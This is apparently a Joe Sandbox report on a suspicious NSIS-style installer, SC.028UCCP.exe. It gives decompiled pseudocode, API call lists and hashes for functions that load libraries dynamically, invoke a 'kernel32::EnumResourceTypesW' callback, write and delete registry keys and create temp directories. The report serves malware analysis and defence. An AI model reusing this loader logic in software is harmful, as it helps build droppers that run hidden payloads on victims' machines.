Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%
API String ID: 4209647438-2449383134
Opcode ID: aba47b48a9928ac6846ac2c3c3fa3cecc3ff6eb2f49fa31c431ac569253bfb25
Instruction ID: e6e53096b9df34268c081c1931919b8a79bb66bca8ede7c05b8811e72ff60024
Opcode Fuzzy Hash: aba47b48a9928ac6846ac2c3c3fa3cecc3ff6eb2f49fa31c431ac569253bfb25
Instruction Fuzzy Hash: 17617C7180221AEBCB10CF66DA447AF7BB8EB40755F10453BF810B72D4D7B89A40DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401F68 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E00401F68(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42ec58");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42ec28 =  *0x42ec28 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A07(0xfffffff0);
				 *(_t34 + 8) = E00402A07(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404EA5(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)", 0x40afc4, " \xef\xbf\xbdB"); // 						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E004035E3(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401f68
0x00401f68
0x00401f6d
0x00401f74
0x0040202f
0x0040217a
0x0040217a
0x0040289c
0x0040289f
0x004028ab
0x004028ab
0x00401f83
0x00401f8d
0x00401f90
0x00401f9f
0x00401fa3
0x00401fa9
0x00401fad
0x00402028
0x00000000
0x00402028
0x00401faf
0x00401fb8
0x00401fbc
0x00402000
0x00401fbe
0x00401fc1
0x00401fc4
0x00401ff4
0x00401fc6
0x00401fc9
0x00401fd2
0x00401fd4
0x00401fd4
0x00401fd2
0x00401fc4
0x00402008
0x0040201d
0x0040201d
0x00000000
0x00402008
0x00401f93
0x00401f99
0x00401f9d
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93

Part of subcall function 00404EA5: lstrlenA.KERNEL32(00429800,00000000,0041B7D0,75DD23A0,?,?,?,?,?,?,?,?,?,00402FC7,00000000,?), ref: 00404EDE
Part of subcall function 00404EA5: lstrlenA.KERNEL32(00402FC7,00429800,00000000,0041B7D0,75DD23A0,?,?,?,?,?,?,?,?,?,00402FC7,00000000), ref: 00404EEE
Part of subcall function 00404EA5: lstrcatA.KERNEL32(00429800,00402FC7,00402FC7,00429800,00000000,0041B7D0,75DD23A0), ref: 00404F01
Part of subcall function 00404EA5: SetWindowTextA.USER32(00429800,00429800), ref: 00404F13
Part of subcall function 00404EA5: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F39
Part of subcall function 00404EA5: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F53
Part of subcall function 00404EA5: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F61

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D

Strings

kernel32::EnumResourceTypesW(i 0,i r1,i 0), xrefs: 00401FE7
B, xrefs: 00401FDD

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: B$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
API String ID: 2987980305-852152979
Opcode ID: a2a6e10e03f190fb71f87f1f2a28dbfcf7ca9d1997bfabcbdd32e5a8b3878e1a
Instruction ID: 79fa90d82ccd561df316461cbb3a1ba09b48d8e8b52b881675a17e3388d19d59
Opcode Fuzzy Hash: a2a6e10e03f190fb71f87f1f2a28dbfcf7ca9d1997bfabcbdd32e5a8b3878e1a
Instruction Fuzzy Hash: F0215B32904211A6CF207FA5CE89A6E3970AF44358F20413BF601B62D1DBBD49419A5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040231A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0040231A(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				long _t22;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402AFC(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x2c) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E00402A07(2);
				_t18 = E00402A07(0x11);
				_t30 =  *0x42ec50; // 0x100
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27); // executed
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A07(0x23);
						_t19 = lstrlenA(0x40a3c0) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029EA(3);
						 *0x40a3c0 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E6C( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a3c0, 0xc00); // executed
					}
					_t22 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x2c), 0x40a3c0, _t19); // executed
					if(_t22 == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42ec28 =  *0x42ec28 +  *(_t37 - 4);
				return 0;
			}

0x0040231b
0x00402320
0x0040232a
0x00402334
0x00402337
0x00402341
0x00402351
0x00402358
0x00402360
0x0040236e
0x00402372
0x0040237d
0x0040237d
0x00402381
0x00402385
0x0040238b
0x00402390
0x00402390
0x00402394
0x004023a0
0x004023a0
0x004023b1
0x004023b9
0x004023bb
0x004023bb
0x004023be
0x0040248e
0x0040248e
0x0040289f
0x004028ab

APIs

RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 00402358
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc7F31.tmp,00000023,?,?,?,00000100,?,?,?,00000011,00000002), ref: 00402378
RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsc7F31.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 004023B1
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc7F31.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040248E

Strings

C:\Users\user\AppData\Local\Temp\nsc7F31.tmp, xrefs: 00402369, 0040238B, 0040239B, 004023A6

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsc7F31.tmp
API String ID: 1356686001-2840754092
Opcode ID: c29f00ab0f4ef0538f62de4efe8d22b9426922cd8dc70cd59bd6115dca28b313
Instruction ID: b27c2e8e59d72643b8274eff82bc1ff1b80250702ef6c9dc6295bb4b4b5c6925
Opcode Fuzzy Hash: c29f00ab0f4ef0538f62de4efe8d22b9426922cd8dc70cd59bd6115dca28b313
Instruction Fuzzy Hash: 8C116071E00108BEEB10EBB5CE8AEAF7678EB44358F10443AF905B61D0D6B86D019B69

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t12;
				int _t18;
				int _t21;
				struct _SECURITY_ATTRIBUTES* _t22;
				signed char _t24;
				struct _SECURITY_ATTRIBUTES* _t25;
				CHAR* _t27;
				struct _SECURITY_ATTRIBUTES** _t31;
				void* _t32;

				_t25 = __ebx;
				_t27 = E00402A07(0xfffffff0);
				_t12 = E004056DE(_t27);
				_t29 = _t12;
				if(_t12 != __ebx) {
					do {
						_t31 = E00405670(_t29, 0x5c);
						 *_t31 = _t25;
						 *((char*)(_t32 + 0xb)) =  *_t31;
						_t21 = CreateDirectoryA(_t27, _t25); // executed
						if(_t21 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t32 - 4)) =  *((intOrPtr*)(_t32 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t27); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t22 =  *((intOrPtr*)(_t32 + 0xb));
						 *_t31 = _t22;
						_t29 =  &(_t31[0]);
					} while (_t22 != _t25);
				}
				if( *((intOrPtr*)(_t32 - 0x20)) == _t25) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B98("C:\\Users\\Arthur\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter\\cavil\\Ablativers91", _t27);
					_t18 = SetCurrentDirectoryA(_t27); // executed
					if(_t18 == 0) {
						 *((intOrPtr*)(_t32 - 4)) =  *((intOrPtr*)(_t32 - 4)) + 1;
					}
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t32 - 4));
				return 0;
			}

0x004015b3
0x004015ba
0x004015bd
0x004015c2
0x004015c6
0x004015c8
0x004015d0
0x004015d6
0x004015d8
0x004015db
0x004015e3
0x004015f0
0x004015fd
0x004015fd
0x004015f2
0x004015f3
0x004015fb
0x00000000
0x00000000
0x004015fb
0x004015f0
0x00401600
0x00401603
0x00401605
0x00401606
0x004015c8
0x0040160d
0x00401638
0x0040217a
0x0040160f
0x00401611
0x0040161c
0x00401622
0x0040162a
0x00401630
0x00401630
0x0040162a
0x0040289f
0x004028ab

APIs

Part of subcall function 004056DE: CharNextA.USER32(?,?,Resolver.Sel,?,0040574A,Resolver.Sel,Resolver.Sel,?,?,75DD3410,00405495,?,C:\Users\user\AppData\Local\Temp\,75DD3410,00000000), ref: 004056EC
Part of subcall function 004056DE: CharNextA.USER32(00000000), ref: 004056F1
Part of subcall function 004056DE: CharNextA.USER32(00000000), ref: 00405705

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91
API String ID: 3751793516-63491931
Opcode ID: b485256cae0e4eabec218592452bde1411ee252b96ffd45204502214cc4f2ee5
Instruction ID: ee19d1f973d54ef8b99b3b54f6c062267f549ed0b0d588b48896c2ad5940add3
Opcode Fuzzy Hash: b485256cae0e4eabec218592452bde1411ee252b96ffd45204502214cc4f2ee5
Instruction Fuzzy Hash: 42112532908150ABDB212F755D04EAF77B4AA66366724073BF491B62E2C63D1D428A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00405875 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405875(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x409368; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405879
0x0040587f
0x00405880
0x00405880
0x00405885
0x00405886
0x00405889
0x00405893
0x004058a0
0x004058a3
0x004058ab
0x00000000
0x00000000
0x004058af
0x00000000
0x00000000
0x004058b1
0x00000000
0x004058b1
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405889
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004058A3

Strings

nsa, xrefs: 00405880
"C:\Users\user\Desktop\SC.028UCCP.exe", xrefs: 00405875
C:\Users\user\AppData\Local\Temp\, xrefs: 00405878, 0040587C

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2004920795
Opcode ID: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
Instruction ID: 1dda5c804d7827273bb1028780a4a64484350cceb0838572b068d11ab2f99610
Opcode Fuzzy Hash: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
Instruction Fuzzy Hash: 44F0E2333082046BEB009F16DC04B9B7B9DDF91760F00C037FD04DA180D2B098548B59

Uniqueness

Uniqueness Score: -1.00%

Function 00402A47 Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00402A47(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x42ec50; // 0x100
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8); // executed
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A47(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405EC3(2);
					if(_t27 == 0) {
						__eflags =  *0x42ec50; // 0x100
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ec50, 0);
				}
				return _t18;
			}

0x00402a57
0x00402a68
0x00402a70
0x00402a98
0x00402a7f
0x00402a82
0x00402ad2
0x00402ad8
0x00402ada
0x00000000
0x00402ada
0x00402a8f
0x00402a94
0x00402a96
0x00000000
0x00000000
0x00402a96
0x00402aad
0x00402ab5
0x00402abc
0x00402ae2
0x00402ae8
0x00000000
0x00000000
0x00402af0
0x00402af6
0x00402af8
0x00000000
0x00000000
0x00000000
0x00402af8
0x00000000
0x00402acb
0x00402adf

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,00000100,?), ref: 00402A68
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA4
RegCloseKey.ADVAPI32(?), ref: 00402AAD
RegCloseKey.ADVAPI32(?), ref: 00402AD2
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF0

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 84196d7f5fc02fe5ab8711ceac2d863dfcc787af46e28da4b55052b4393e713e
Instruction ID: 65caa8dba947dc35e866d31b7f01948ae96153933ca281d28be61e62e6d6ab53
Opcode Fuzzy Hash: 84196d7f5fc02fe5ab8711ceac2d863dfcc787af46e28da4b55052b4393e713e
Instruction Fuzzy Hash: C9116D31600108BFDF219F91DE49EAB3B7DEB04358B104436FA05F00A0DBB48E529F69

Uniqueness

Uniqueness Score: -1.00%

Function 100016DA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E100016DA(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				 *0x10004064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001573);
				_push(1); // executed
				_t34 = E10001A86(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002165(_t50);
					}
					E100021AF(_t65, _t50);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_push(_t50);
								_t34 = E1000236D(_t65);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x818; // 0x818
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E10001576(_t50);
								_t15 = _t50 + 0x818; // 0x818
								_t70 = _t15;
								_push(_t50);
								 *((intOrPtr*)(_t50 + 0x820)) = _t38;
								 *_t70 = 3;
								E1000236D(_t65);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							_push(_t50);
							E1000236D(_t65);
							_t34 = GlobalFree(E10001278(E10001576(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E10002333(_t50);
							if(( *(_t50 + 0x810) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x808);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x810) & 0x00000020) != 0) {
								_t34 = E100014FF( *0x10004058);
							}
						}
						if(( *(_t50 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002A57(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E1000279C(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002540(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x100016da
0x100016da
0x100016da
0x100016e4
0x100016ec
0x100016f9
0x10001707
0x1000170a
0x1000170c
0x10001711
0x10001716
0x10001829
0x10001829
0x1000171c
0x10001720
0x10001723
0x10001728
0x1000172a
0x10001730
0x10001736
0x10001766
0x1000176d
0x10001791
0x100017cf
0x100017d0
0x10001793
0x10001793
0x10001794
0x10001797
0x1000179d
0x100017a1
0x100017a4
0x100017a9
0x100017a9
0x100017af
0x100017b0
0x100017b6
0x100017bc
0x100017c8
0x100017c9
0x100017cc
0x1000176f
0x1000176f
0x10001770
0x10001785
0x10001785
0x100017da
0x100017dd
0x100017ea
0x100017f1
0x100017f9
0x100017fc
0x100017fc
0x100017f9
0x10001809
0x10001811
0x10001816
0x10001809
0x1000181e
0x00000000
0x10001820
0x00000000
0x10001821
0x1000181e
0x1000173a
0x1000173d
0x1000175b
0x00000000
0x00000000
0x1000175e
0x10001763
0x10001763
0x10001765
0x00000000
0x10001765
0x1000173f
0x10001740
0x10001748
0x10001749
0x00000000
0x10001749
0x10001742
0x10001743
0x10001751
0x00000000
0x10001751
0x10001746
0x00000000
0x00000000
0x00000000
0x10001746

APIs

Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CCE
Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CD3
Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CD8

GlobalFree.KERNEL32(00000000), ref: 10001785
FreeLibrary.KERNEL32(?), ref: 100017FC
GlobalFree.KERNEL32(00000000), ref: 10001821

Part of subcall function 10002165: GlobalAlloc.KERNEL32(00000040,8A470175), ref: 10002197

Part of subcall function 10002540: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001756,00000000), ref: 100025B2

Part of subcall function 10001576: lstrcpyA.KERNEL32(00000000,?,00000000,100016B2,00000000), ref: 1000158F

Part of subcall function 1000236D: wsprintfA.USER32 ref: 100023D2
Part of subcall function 1000236D: GlobalFree.KERNEL32(?), ref: 1000248E
Part of subcall function 1000236D: GlobalFree.KERNEL32(00000000), ref: 100024B7

Strings

, xrefs: 10001802

Memory Dump Source

Source File: 00000000.00000002.2999566321.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2999506923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999612936.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999647911.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_SC.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpywsprintf
String ID:
API String ID: 1767494692-3916222277
Opcode ID: 69ff26e15bd1d134cfd18c4da18543aa1d4c3e31032a7704be2a755bcfa9ddd4
Instruction ID: a4822a2f56843d2abdfa94b6917cafe90cab4d4c428c41a0756c8854a89f2b82
Opcode Fuzzy Hash: 69ff26e15bd1d134cfd18c4da18543aa1d4c3e31032a7704be2a755bcfa9ddd4
Instruction Fuzzy Hash: 3131AD759046059AFB41EF249CC9BDA37ECFF052D0F00C029FA09AA09EDF7499458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00404E19 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00404E19(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t9;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a00c != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a00c = _t16;
							E004047F0();
						}
						L11:
						_t9 = CallWindowProcA( *0x42a014, _a4, _t15, _a12, _t16); // executed
						return _t9;
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404770(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403EF4(0x413);
				return 0;
			}

0x00404e1d
0x00404e27
0x00404e43
0x00404e65
0x00404e68
0x00404e6e
0x00404e78
0x00404e79
0x00404e7b
0x00404e81
0x00404e81
0x00404e8b
0x00404e99
0x00000000
0x00404e99
